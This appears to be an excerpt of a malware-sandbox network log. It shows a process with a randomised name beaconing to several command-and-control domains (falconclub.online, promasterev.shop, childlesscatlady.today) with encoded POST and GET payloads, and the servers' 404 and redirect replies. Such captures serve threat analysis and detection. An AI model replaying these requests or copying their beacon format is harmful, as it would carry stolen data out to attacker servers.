                                                                      Nov 7, 2024 15:27:55.243988991 CET776OUTPOST /sld7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.falconclub.online
                                                                      Origin: http://www.falconclub.online
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 223
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.falconclub.online/sld7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 79 75 32 4c 63 68 76 55 63 45 70 51 7a 6d 46 52 37 2b 43 53 79 38 5a 4e 64 41 78 47 35 36 2b 79 4f 57 51 37 70 46 69 77 48 6f 61 49 61 4c 4f 38 36 74 70 4b 47 33 70 74 4f 49 45 4f 70 34 42 4c 7a 53 52 51 68 4b 64 76 4b 61 68 34 79 68 77 71 31 32 56 56 72 70 58 50 68 50 33 75 32 35 70 6a 64 6c 31 77 30 2f 4d 45 79 77 68 74 31 4b 44 4b 39 71 66 67 65 4c 76 44 71 41 43 6e 4d 71 73 49 6f 38 54 66 4b 41 48 51 65 66 53 46 4a 38 59 6e 68 67 6a 70 31 48 43 6d 39 4e 56 46 43 4d 6d 78 4a 5a 6b 30 41 58 45 71 54 76 67 72 67 4f 72 76 57 6a 49 65 52 66 4e 31 70 4f 64 4d 61 4e 6b 78 4f 62 42 57 64 39 2f 6c 66 31 6f 6c 36 41 62 64 76 30 51 77 49 47 43 43 50 4e 74 6d
                                                                      Data Ascii: F2=yu2LchvUcEpQzmFR7+CSy8ZNdAxG56+yOWQ7pFiwHoaIaLO86tpKG3ptOIEOp4BLzSRQhKdvKah4yhwq12VVrpXPhP3u25pjdl1w0/MEywht1KDK9qfgeLvDqACnMqsIo8TfKAHQefSFJ8Ynhgjp1HCm9NVFCMmxJZk0AXEqTvgrgOrvWjIeRfN1pOdMaNkxObBWd9/lf1ol6Abdv0QwIGCCPNtm
                                                                      Nov 7, 2024 15:27:55.885152102 CET580INHTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Date: Thu, 07 Nov 2024 14:27:55 GMT
                                                                      Server: Apache
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                                      Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.84971474.208.236.25805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:27:57.790715933 CET1793OUTPOST /sld7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.falconclub.online
                                                                      Origin: http://www.falconclub.online
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1239
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.falconclub.online/sld7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 79 75 32 4c 63 68 76 55 63 45 70 51 7a 6d 46 52 37 2b 43 53 79 38 5a 4e 64 41 78 47 35 36 2b 79 4f 57 51 37 70 46 69 77 48 6f 53 49 62 34 32 38 37 4f 42 4b 46 33 70 74 56 49 45 4c 70 34 42 53 7a 53 49 59 68 4b 51 51 4b 59 70 34 77 44 6f 71 39 69 35 56 69 70 58 50 2b 66 33 74 72 70 70 4d 64 6c 6c 38 30 2f 63 45 79 77 68 74 31 49 72 4b 2b 37 66 67 59 4c 76 41 70 41 43 37 49 71 74 56 6f 38 4b 69 4b 44 72 71 65 4d 61 46 4d 73 49 6e 67 53 37 70 39 48 43 34 2b 4e 55 59 43 4a 2b 71 4a 5a 34 4a 41 58 59 45 54 76 59 72 6b 59 61 32 41 67 34 65 48 63 46 6b 75 64 52 36 5a 4d 73 6c 50 64 4e 4f 59 71 43 41 64 6a 49 4d 37 47 50 75 76 44 4a 39 56 51 75 45 42 6f 73 2b 45 58 58 47 75 37 36 6e 63 6f 7a 37 2b 4b 44 41 61 50 72 58 59 64 58 74 75 64 45 68 77 72 4b 33 45 67 4f 76 53 6e 64 47 68 54 35 51 31 48 39 35 30 77 44 58 4f 47 58 53 77 2b 68 75 4b 32 56 6c 34 73 77 71 38 64 44 6e 58 34 59 4e 43 46 52 37 78 71 50 6c 70 6d 57 55 50 67 67 55 68 47 55 6c 55 35 4b 2b 63 4f 62 4a 56 69 6b 43 55 49 41 47 49 55 65 [TRUNCATED]
                                                                      Data Ascii: F2=yu2LchvUcEpQzmFR7+CSy8ZNdAxG56+yOWQ7pFiwHoSIb4287OBKF3ptVIELp4BSzSIYhKQQKYp4wDoq9i5VipXP+f3trppMdll80/cEywht1IrK+7fgYLvApAC7IqtVo8KiKDrqeMaFMsIngS7p9HC4+NUYCJ+qJZ4JAXYETvYrkYa2Ag4eHcFkudR6ZMslPdNOYqCAdjIM7GPuvDJ9VQuEBos+EXXGu76ncoz7+KDAaPrXYdXtudEhwrK3EgOvSndGhT5Q1H950wDXOGXSw+huK2Vl4swq8dDnX4YNCFR7xqPlpmWUPggUhGUlU5K+cObJVikCUIAGIUeO+RyC5htnlaG2Aio/2p0GCfl2Bgx9Ui95MUOpSkyCjtMw5HY3B8ZMzSu9Xay50vPYKg1f+HkgZS9KiNHKvY7CRSHhPFomZ1vYp2tFWeWbcxCblvx7TgPycj4aXHP3XgKerxqCUagCV1Ri6sCGx1uvsKcgQ+lwp+5KJdWcLR1wh+GS5WnuD/vq2LI8VwKopQqzKH4mWUn8FWj3MXbUf+7L2R7IJh5ug42BIlVnhm2lAwKKCJuRMPI/c4J6wyhioRn3RWT+tbyf3vTep336r4Vdm+9+k/qhFT5nAnaNITzFyAWnoj0MR+Up8m0s0sodSynD+UgDQbwNyKMXdEdGhEVJbGT2Uo0j/zs48GRoU0D6zDvEHsvt3drwIb6jo59bzbDeqRC/aBVfKuF5C5lqDVts4xMd2YWW4QhX0PcfXEAJr9sfBkw+7i+dQxWmqajDur9F98xHIHBVg75bJPUlvKQ3dVm2/ttnQcpn7WBu77NDgb+NlYz/6FEF/yTetDi4dKKkYbjOVslfhRdPajeybQ0pTB1117Rk9r3JKYtFQr6mqXKi/eq3p/nxuJTTPWt4UzGNoD/l3NO/fL3Sc2h2ILGh8aEnwNhEJl/GnebdVvbhmtpI4k0DJz0/Rflb+SWxs9TFPFVcO2xKpWk+z7E0gBbYFGsBlaHmPq+Fx [TRUNCATED]
                                                                      Nov 7, 2024 15:27:58.397226095 CET580INHTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Date: Thu, 07 Nov 2024 14:27:58 GMT
                                                                      Server: Apache
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                                      Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.84971574.208.236.25805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:28:00.333995104 CET487OUTGET /sld7/?F2=/serfU6kaxhlkkJx8dOr0qlSRXA+6La0KEB68G6jbYfyT6z2zvVJBFhkOYA104kn6FRHm7lAc7gn2TRu9DlzyIrvo6u+6+g1Ilwo5dhHoQBd/NfHtrD7TOfEhTSvK6UN8A==&sHS=543hApwHD HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.falconclub.online
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Nov 7, 2024 15:28:00.977595091 CET770INHTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Content-Length: 626
                                                                      Connection: close
                                                                      Date: Thu, 07 Nov 2024 14:28:00 GMT
                                                                      Server: Apache
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.8497273.33.130.190805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:28:06.056727886 CET753OUTPOST /abrg/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.promasterev.shop
                                                                      Origin: http://www.promasterev.shop
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.promasterev.shop/abrg/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 4c 6c 6f 70 6c 55 78 78 4b 78 65 58 38 6e 36 55 75 30 35 55 6a 71 6c 37 62 6e 44 52 5a 51 62 4c 6e 33 4e 43 33 2f 35 65 47 64 43 32 6f 44 4b 4b 48 46 4b 45 79 70 6d 72 56 61 39 69 39 61 79 66 42 61 4b 4a 2f 66 71 37 69 56 35 71 55 4e 79 6b 33 4b 4f 4f 47 35 6a 6c 73 4a 74 4f 48 63 50 55 64 4b 78 65 78 47 6c 67 48 4d 38 43 6d 66 55 47 78 79 47 36 65 44 34 4d 46 4c 65 72 61 72 66 44 63 51 4d 47 72 57 72 43 69 67 38 48 4b 67 34 78 4d 73 52 70 45 63 36 63 66 70 32 33 55 30 76 6b 76 6c 63 6c 4a 6e 52 6e 4b 76 4e 71 66 68 35 4e 45 65 67 59 37 64 5a 51 5a 38 6b 35 50 54 68 62 4a 31 68 43 62 51 63 3d
                                                                      Data Ascii: F2=LloplUxxKxeX8n6Uu05Ujql7bnDRZQbLn3NC3/5eGdC2oDKKHFKEypmrVa9i9ayfBaKJ/fq7iV5qUNyk3KOOG5jlsJtOHcPUdKxexGlgHM8CmfUGxyG6eD4MFLerarfDcQMGrWrCig8HKg4xMsRpEc6cfp23U0vkvlclJnRnKvNqfh5NEegY7dZQZ8k5PThbJ1hCbQc=


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.8497423.33.130.190805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:28:08.602761030 CET773OUTPOST /abrg/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.promasterev.shop
                                                                      Origin: http://www.promasterev.shop
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 223
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.promasterev.shop/abrg/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 4c 6c 6f 70 6c 55 78 78 4b 78 65 58 38 48 71 55 76 54 74 55 6c 4b 6c 38 58 48 44 52 51 77 62 48 6e 33 4a 43 33 2b 39 4f 47 6f 71 32 6f 68 53 4b 56 30 4b 45 78 70 6d 72 62 36 39 72 35 61 79 75 42 61 32 42 2f 64 4f 37 69 57 46 71 55 4d 43 6b 33 37 4f 4e 48 70 6a 6e 68 70 74 41 61 73 50 55 64 4b 78 65 78 47 42 4f 48 4d 6b 43 6d 76 45 47 79 51 2b 39 55 6a 34 4e 41 4c 65 72 51 4c 65 72 63 51 4d 30 72 55 66 34 69 6a 55 48 4b 67 6f 78 4e 2b 70 6f 4e 63 36 53 52 4a 33 39 46 46 79 4b 72 6e 73 2b 55 33 42 55 4d 4f 31 6c 58 33 55 6e 65 38 6f 65 34 64 78 37 5a 2f 4d 50 4b 6b 38 7a 54 57 78 79 46 48 4a 65 78 48 58 4d 6b 66 76 75 6b 34 47 6c 49 61 65 78 4f 2f 69 66
                                                                      Data Ascii: F2=LloplUxxKxeX8HqUvTtUlKl8XHDRQwbHn3JC3+9OGoq2ohSKV0KExpmrb69r5ayuBa2B/dO7iWFqUMCk37ONHpjnhptAasPUdKxexGBOHMkCmvEGyQ+9Uj4NALerQLercQM0rUf4ijUHKgoxN+poNc6SRJ39FFyKrns+U3BUMO1lX3Une8oe4dx7Z/MPKk8zTWxyFHJexHXMkfvuk4GlIaexO/if


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.8497583.33.130.190805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:28:11.150594950 CET1790OUTPOST /abrg/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.promasterev.shop
                                                                      Origin: http://www.promasterev.shop
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1239
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.promasterev.shop/abrg/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 4c 6c 6f 70 6c 55 78 78 4b 78 65 58 38 48 71 55 76 54 74 55 6c 4b 6c 38 58 48 44 52 51 77 62 48 6e 33 4a 43 33 2b 39 4f 47 75 79 32 6f 51 79 4b 45 6e 79 45 77 70 6d 72 54 61 39 6d 35 61 79 7a 42 65 61 46 2f 64 43 42 69 51 42 71 55 75 4b 6b 2b 76 69 4e 4a 70 6a 6e 6f 4a 74 4e 48 63 50 37 64 4b 67 58 78 47 52 4f 48 4d 6b 43 6d 71 41 47 6c 53 47 39 62 44 34 4d 46 4c 65 76 61 72 65 51 63 57 6c 42 72 55 62 6f 69 53 30 48 4a 42 59 78 50 4e 52 6f 4d 38 36 51 63 70 32 6f 46 46 2b 4a 72 6e 77 45 55 30 63 63 4d 4a 5a 6c 48 78 51 35 47 4f 6b 49 6d 37 31 58 64 76 35 6b 46 31 77 72 59 6c 46 32 5a 6d 77 2f 39 69 37 41 69 4d 6a 38 75 37 58 50 63 63 75 37 45 5a 2b 54 79 55 58 73 4b 66 2b 70 6b 78 76 72 44 63 65 78 61 56 52 61 6c 54 58 6d 68 46 58 67 48 30 74 6f 35 6c 70 6c 78 47 6a 61 35 2b 7a 4d 52 4b 37 30 64 69 4d 51 70 31 49 74 30 4d 68 69 46 6c 45 6d 64 55 75 72 56 72 32 69 53 68 65 2b 75 4f 7a 78 47 66 44 37 37 4c 72 65 6c 57 2b 4e 79 46 62 31 73 42 31 75 31 33 58 44 64 47 52 76 50 77 76 6e 73 39 48 [TRUNCATED]
                                                                      Data Ascii: F2=LloplUxxKxeX8HqUvTtUlKl8XHDRQwbHn3JC3+9OGuy2oQyKEnyEwpmrTa9m5ayzBeaF/dCBiQBqUuKk+viNJpjnoJtNHcP7dKgXxGROHMkCmqAGlSG9bD4MFLevareQcWlBrUboiS0HJBYxPNRoM86Qcp2oFF+JrnwEU0ccMJZlHxQ5GOkIm71Xdv5kF1wrYlF2Zmw/9i7AiMj8u7XPccu7EZ+TyUXsKf+pkxvrDcexaVRalTXmhFXgH0to5lplxGja5+zMRK70diMQp1It0MhiFlEmdUurVr2iShe+uOzxGfD77LrelW+NyFb1sB1u13XDdGRvPwvns9HDdClK9ekXCnPkne3Zvo8qh4MgXezQTVbqdfutNRcpOLVM0HPC3+eE+3XN2PzLCRa8EHfWkjlMH9w4sfYKSk8IY4/ZXYweTpD9qU0qBvDX2nyg8vMYE/nJL6/Ys9k6Xk7iexwVXyHNsYLlkWF/fEMqICsEHm0m2CEGjver9tTUE9CWT3A/DRMPMLKyRdufb4Gv/BtDz7Fo4pTv/x0mOLbq67yCZ6cStX5I9ZhQI4jSyNotY/frfbfgHz86PBtG3zIpvZzTRwyedN9zjTx+sNujogkqzjJ1dHRIxcx2o79jh1b2PaNgwsYy+UjHE3046zjEj7RSvZL6kspBVhQHqqIWNN1GRfZ8YHuVb2Ca5EU+t1qeNmlvj4JzNSCV/rGOldKlduvI9JNWZaU7DD1UiV5SxBIKXh88AhPDWPMP5U8Zq4jMLsCfMFhJGLdnd4Yw9LG8MvoTi6uSwGRDv1YCDB7F28Zxc5otxIz9kgaRzCCdzH9GjSdZtnuTQELQzA87rL0IrDLFuNdlwChcNFN1PjKd+K4XP6XiZNsvR6l5RWCwH+yiOjX7kV6Le9c8X0vYARkWMtSFiGJMDoyt14B295ckUa/ejymuTYHkl2Q8JFbgWIgNYZ2SHn2KW/4W1fZ6lXjhpVbch5vtQXf3r9wPu2y2SSUNQiTXL//NT [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      8192.168.2.8497753.33.130.190805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:28:13.693474054 CET486OUTGET /abrg/?F2=GnAJmiRPPiyH2TmfuBVnsZoXdGf0FUPFySgQhtVOM4GwnDq9Dnvh9ePCWYtJxLLAU+yG0d2c2V85YMiF3u+CXoS/lp19JNeFf5Feq2s9J88WlfAexgO/UytfAJO4SOXJGQ==&sHS=543hApwHD HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.promasterev.shop
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Nov 7, 2024 15:28:14.356386900 CET404INHTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Thu, 07 Nov 2024 14:28:14 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 264
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 32 3d 47 6e 41 4a 6d 69 52 50 50 69 79 48 32 54 6d 66 75 42 56 6e 73 5a 6f 58 64 47 66 30 46 55 50 46 79 53 67 51 68 74 56 4f 4d 34 47 77 6e 44 71 39 44 6e 76 68 39 65 50 43 57 59 74 4a 78 4c 4c 41 55 2b 79 47 30 64 32 63 32 56 38 35 59 4d 69 46 33 75 2b 43 58 6f 53 2f 6c 70 31 39 4a 4e 65 46 66 35 46 65 71 32 73 39 4a 38 38 57 6c 66 41 65 78 67 4f 2f 55 79 74 66 41 4a 4f 34 53 4f 58 4a 47 51 3d 3d 26 73 48 53 3d 35 34 33 68 41 70 77 48 44 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?F2=GnAJmiRPPiyH2TmfuBVnsZoXdGf0FUPFySgQhtVOM4GwnDq9Dnvh9ePCWYtJxLLAU+yG0d2c2V85YMiF3u+CXoS/lp19JNeFf5Feq2s9J88WlfAexgO/UytfAJO4SOXJGQ==&sHS=543hApwHD"}</script></head></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      9192.168.2.8498073.33.130.190805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:28:19.442677021 CET771OUTPOST /itly/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.childlesscatlady.today
                                                                      Origin: http://www.childlesscatlady.today
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.childlesscatlady.today/itly/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 67 75 36 68 65 37 78 4b 79 2f 6f 4c 66 64 72 32 52 72 59 46 6c 44 50 70 4e 79 4d 42 65 72 46 71 78 4a 37 63 4d 54 73 71 58 65 7a 61 2b 6c 41 41 46 6f 68 67 4b 45 59 63 58 56 2f 61 50 33 4b 51 50 39 68 6d 33 68 6b 31 61 64 64 4f 30 50 68 6e 52 31 59 4b 57 57 39 52 57 34 36 46 32 48 46 31 38 76 53 62 64 72 37 56 67 2b 42 43 4f 6c 73 69 74 76 4c 63 2b 59 48 41 4e 4b 78 41 34 74 31 48 6f 56 6c 78 59 36 35 32 73 6d 53 5a 4c 45 51 76 69 53 42 6e 67 70 36 67 42 65 4e 66 6e 61 75 4b 43 37 74 61 67 69 7a 35 37 45 56 4b 4b 30 59 6f 39 69 6f 57 77 41 73 4d 4d 42 59 41 6f 63 74 74 49 45 63 63 79 68 38 3d
